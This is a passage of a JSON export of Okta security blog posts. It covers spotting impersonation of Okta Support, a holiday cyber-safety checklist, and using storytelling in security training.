Email\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Support emails will be from \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"mailto:support@okta.com\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"support@okta.com\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" or \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"mailto:support@auth0.com\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"support@auth0.com\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" and Okta emails will be sent from \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"mailto:noreply@securityalerts.okta.com\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"noreply@securityalerts.okta.com\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" or \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"mailto:noreply@okta.com\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"noreply@okta.com\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"2. SMS\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Text alerts are sent from SMS numbers or short codes that may vary by country. In the US, they are from 893-61.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"3. Phone\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta and Okta Support may contact you by phone, with numbers varying by region. 
Please note that incoming calls could potentially be spoofed by threat actors who deliberately falsify the caller ID displayed in order to disguise their Identity. Incoming caller ID alone should not validate the caller as authentic.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"What can you do?\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Social engineering scams prey on urgency and emotional reaction. When receiving suspicious, unsolicited contact, be vigilant of the following common indicators of social engineering:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Suspicious email address\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A social engineering sender will often imitate the address of a legitimate business or organization; however, some characters may vary, be omitted, or be misspelled.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Urgency and emotional response\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Recognizable signs of an attempt include urgency and manipulation of an emotional response as tactics. 
In these cases, social engineering attackers may use time-sensitive situations and/or a narrative to invoke an emotional response with the goal of coercing impulsive decisions.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Spelling, grammar and layout\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"One of the most obvious indicators is a message with poor sentence structure, improper grammar and incorrect spelling. In some cases, the layout including formatting of the message is irregular. It should be noted that with the emergence of AI technology, spelling and grammar errors are not always obvious, or even present.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Suspicious links or attachments\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Unsolicited email or SMS messages including attachments or links should be verified prior to opening, especially if the messaging involves a sense of urgency.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"For more information on how to protect yourself, your workforce, your business and your customers, read up on \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/resources/whitepaper-ultimate-guide-to-phishing/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta’s Ultimate Guide to Phishing 
Prevention\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"How to report Okta Impersonation Attempts?\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If you come across a suspected impersonation attempt of Okta or Okta Support as a customer, please promptly raise a customer support ticket or inform Okta Security by email at \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"mailto:security@okta.com\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"security@okta.com\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". \",\"marks\":[],\"data\":{}}]}]}"},"summary":{"summary":"Okta has identified an increase in phishing social engineering attempts. This report provides guidance on what you can expect when getting technical assistance from Okta Support, or contact from Okta."},"updatedAt":"2024-12-19T21:22:49.122Z","secAuthor":[{"id":"1e934185-d220-5cf6-915f-afe21369ab6b","bio":{"bio":""},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/2mSwf13fQ5aH31DZNddqtd/0855adabe0c07ddc9ceaa460ebd1d935/Okta_Aura_CMYK_Black.jpg"},"name":"Okta","jobTitle":"","slug":"okta","node_locale":"en"}]},{"slug":"/articles/2024/cyber-safety-over-the-holidays","id":"3caf3c93-bbbf-5f71-bb74-90b8970e9893","title":"Cyber-Safety over the Holidays","date":"2024-12-18T11:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In 2023, consumers worldwide lost over 
\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.gasa.org/post/global-state-of-scams-report-2024-1-trillion-stolen-in-12-months-gasa-feedzai#:~:text=Based%20on%20responses%20from%2058%2C329,the%20GDP%20of%20some%20nations.\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"$1 trillion\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" to scams with wide-ranging economic and emotional consequences. Despite significant efforts dedicated to combatting scam-based cybercrime, many continue to fall victim to ever-evolving threats.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta’s market-leading Identity solutions continually evolve as mission-critical security infrastructure to combat Identity-based attacks. Over a 30-day period, Okta has blocked over \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/secure-identity-commitment/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"3 billion attacks\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" including credential stuffing and malicious bots, securing nearly 20,000 customers globally. 
We invite you to \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/resources/whitepaper-secure-identity-commitment/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"learn more\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" about our long-term initiative to lead the industry in the fight against Identity attacks.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Check out our Security Culture team’s cyber-safety checklist to help keep your digital Identity safe this holiday season.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Cyber-Safety Checklist\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"At Okta, we believe in sharing valuable, actionable security insights because we \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Love our Customers\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\". As the holiday season approaches and scams continue to emerge, here are five easy tips from Okta’s Security Culture team to help keep you, your data, and your devices safe and secure.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"1. Monitor your accounts\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Catching suspicious or fraudulent charges early gives you a greater chance of restoring lost funds, preventing further compromise and also halting unauthorized spending.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Check your bank accounts and credit cards regularly to validate intentional transactions and their totals. 
Most providers allow you to set up alerts and/or multi-factor authentication (MFA) for additional protection. In practicing good credit hygiene, you should also consider:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Requesting a (usually free) copy of your credit report.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Signing up to a credit monitoring service.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"2. Check your tech\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Vulnerabilities in both outdated software applications and operating systems are more likely to be exploited by threat actors in order to gain unauthorized access to your accounts.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We recommend always using up-to-date devices, especially when performing financial transactions such as online banking or making credit card purchases. Some devices and/or applications allow you to turn on automatic updates to avoid having to manually check for software updates in the future.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"3. Click carefully\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Social media ads, emails and text messages can take you to fake websites that look like the real thing. 
To stay safe, always type the official website URL directly into your browser instead of clicking on links.\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://okta.com/au/identity-101/social-engineering/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\" \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Phishing and smishing\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" are getting increasingly sophisticated and can be hard to tell apart from messages from \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2024/okta-social-engineering-report-response-and-recommendation\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"trusted sources\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Staying cyber-safe means staying updated; numerous organizations and retailers publish best practices they recommend for leveraging their products, services or tools.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"4. 
Shop smart\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"When taking advantage of holiday deals, make sure your credit card information gets securely encrypted.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A good start could be to check the webpage URL, ensuring that it begins with \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/identity-101/http-vs-https/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"HTTPS\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" (and not HTTP) before you check out and enter your sensitive data. It’s good practice to use reputable sites and create an account, enabling multi-factor authentication (MFA) to authenticate for future purchases. In general, it’s a best practice to not have sites save your credit card information, and, when possible, using session-based payments (such as Apple Pay) can provide additional security.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"5. Protect your accounts\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Instead of traditional passwords, we recommend the use of\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/au/identity-101/password-vs-passphrase/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\" passphrases\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" for additional assurance. An eight-character password can be quickly cracked by a threat actor; a strong 12-character passphrase could take years. 
Also, consider using a password manager (such as \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/products/okta-personal/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Personal\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\") to safely and securely store your account credentials.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"It is best practice to enable \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/identity-101/why-mfa-is-everywhere/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"multi-factor authentication (MFA)\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" wherever possible. Given \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.verizon.com/business/resources/reports/dbir/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"81%\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" of breaches involve stolen or weak credentials, use a\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/au/blog/2023/10/passkeys-101-what-they-are-and-how-they-will-replace-passwords/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\" \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"passkey\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" where available. Passkeys are proven to be significantly stronger than standard passwords. 
We recommend using biometrics such as FaceID or Fingerprint to log in and authenticate to your commonly used sites and services.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A Culture of Cybersecurity\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Today’s digital world has evolved tremendously in enabling our online reach, which in turn can expand the potential for impact. Being vigilant to online scams shouldn’t just be a priority over the holiday season. Here at Okta, we promote a culture of cybersecurity all-year-round and recommend building routine habits around our recommendations.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta’s \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Always Secure, Always On\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/blog/2024/04/the-story-behind-oktas-values/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"corporate value\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" reflects our ongoing commitment to make every employee an owner of security. With \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.verizon.com/business/resources/reports/2024-dbir-data-breach-investigations-report.pdf\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"68%\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" of breaches involving a human element, a strong security culture is more important than ever. 
Okta’s culture of cybersecurity is a core value; \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/blog/2024/08/how-okta-fosters-a-security-culture/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"learn more\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" about our foundational pillars and how we foster our security culture.\",\"marks\":[],\"data\":{}}]}]}"},"summary":{"summary":"At Okta, we believe in sharing valuable, actionable security insights because we Love our Customers. Check out our Security Culture team’s cyber-safety checklist to help keep your digital Identity safe this holiday season."},"updatedAt":"2024-12-19T20:59:07.991Z","secAuthor":[{"id":"2f88c41e-3abf-5fcc-9a06-9ed78081f8e2","bio":{"bio":"<p>Carmen Girardin is a Manager, Security Communications at Okta. Backed by over a decade of experience in the fintech sector, Carmen is a proficient technical writer with domain expertise in Identity and Access Management (IAM). She is passionate about delivering engaging, timely customer communications on the cybersecurity ecosystem and the evolving threat landscape, to help our customers gain the most value from Okta. 
Carmen spends her downtime traveling, thrifting for treasures and reading.</p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/gBvc42utKRh6jJpgLjxrt/fb5e38cd4c6043a5e888850b4b2c2df4/IMG_8061.jpg"},"name":"Carmen Girardin","jobTitle":"Manager, Security Communications","slug":"/hackers/carmen-girardin","node_locale":"en"},{"id":"fe6977e6-3784-5b01-9c68-5198f34e986d","bio":{"bio":"<p>Okta's Security Culture team is responsible for championing a world-class security culture via education, trainings, and awareness to make the internet safer both through and for our global employees and our growing customer base.</p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/2mSwf13fQ5aH31DZNddqtd/0855adabe0c07ddc9ceaa460ebd1d935/Okta_Aura_CMYK_Black.jpg"},"name":"Okta Security Culture","jobTitle":null,"slug":"/hackers/security-culture","node_locale":"en"}]},{"slug":"/articles/security-education-storytelling","id":"f64ec9fa-08d1-5438-8563-c176cce5f285","title":"Security Education Through the Art of Storytelling","date":"2024-09-05T08:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In today's digital world, cybersecurity isn't just a technical issue, it's a human one. At Okta, we've taken a fresh approach to security education by leveraging a tool as old as humanity itself - storytelling. 
We aim to make security education effective, engaging, and memorable by weaving narratives into our training sessions.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"What is Storytelling?\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Storytelling is more than just a method of communication; it is a profound way to connect with people, share experiences, and influence thoughts and emotions. As Jimmy Neil Smith, Director of the International Storytelling Center, puts it: “We are all storytellers. We all live in a network of stories. There isn’t a stronger connection between people than storytelling.”\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This connection is why storytelling is such a powerful tool in education. We aren't just relaying information when we tell a story - we create an emotional experience. This emotional investment helps people better remember the lessons long after the session is over.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The Elements of a Good Story\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A compelling story has several key elements:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"ordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Characters:\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" Every story needs a hero and, often, a villain. In the context of cybersecurity, the hero could be the employee who spots a vulnerability during a code review. 
At the same time, the villain might be the adversary trying to breach the system.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The Hero’s Journey:\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" This is the narrative arc where the hero faces a challenge, overcomes obstacles, and emerges victorious (or learns a valuable lesson in defeat).\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Conflict and Resolution:\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" At the core of any good story is conflict. It might be a breach attempt, a security flaw, or risky behavior that needs correcting. The resolution is how the characters (or the audience) learn to address and resolve these issues.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Lessons Learned:\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" What should the audience take away from the story? This could be practical advice, a change in perspective, or a call to action.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"At Okta, we apply these elements to our security education by crafting relatable scenarios that resonate with our audience. We don’t just list the Open Worldwide Application Security Project (OWASP) Top 10 vulnerabilities; we tell the story of the \\\"Okta Top 10” – the Top 10 vulnerabilities we see through code reviews and other methods. 
We weave in real-world examples and metaphors that bring these abstract concepts to life.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"How to Tell a Story in Security Training\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"ordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Know Your Audience:\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" Understanding your audience's background, expertise, and interests is crucial. At Okta, we avoid generic examples that don’t resonate with our employees. Instead, we use examples found in our codebase to make security concepts relatable.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Pull Them in with Emotional Connections:\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" Start with a relatable scenario. Use personal stories, show empathy for their challenges, and highlight how security issues impact them directly.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Make Them Care:\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" To drive the point home, it’s essential to illustrate the real-world consequences of security lapses. 
Show both the adverse outcomes of ignoring best practices and the positive results of adhering to them.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Give Them Something to Remember:\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" Whether it’s a humorous anecdote, a dramatic story arc, or a surprising twist, the goal is to leave the audience with a memorable takeaway. This helps reinforce the lessons learned and encourages better security practices.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Storytelling in Action at Okta\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"When I joined Okta, one of my first tasks was overhauling our secure code training. We decided to shift our focus from traditional lectures to storytelling, using elements from gaming, sci-fi, and fantasy to create a narrative that would resonate with our tech audience.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We created fictional characters, like \\\"The Devs,\\\" representing our product development team members and placing them in scenarios that mimic real-world security challenges. These diverse characters and grounded-in-reality scenarios made them more relatable and effective in conveying the importance of security practices.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"For instance, one of our training modules depicted a hacker attempting to infiltrate a secure area, like trying to gain unauthorized access to a club. 
Using this metaphor, we could visually demonstrate authentication issues and privilege escalation in an engaging and educational way.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Why Storytelling Works\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Good stories surprise us, make us think and feel, and stick in our minds long after we've heard them. In cybersecurity training, this means our employees are more likely to remember the lessons we teach and apply them in their daily work.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We are continuously building on this approach, integrating storytelling deeper into our security culture, making our educational materials informative, and reflecting our unique culture at Okta.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"By embracing storytelling, we transform our security training from a mundane task into a memorable experience that fosters a culture of security awareness throughout the organization.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Conclusion\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Storytelling is a powerful tool in security education. It makes training more engaging, relatable, and memorable, helping employees not just learn about security best practices but also internalize them. At Okta, we have heard from our employees that they find the training relatable and enjoyable. We are also seeing a higher level of on-time completion rates than we did with previous trainings. 
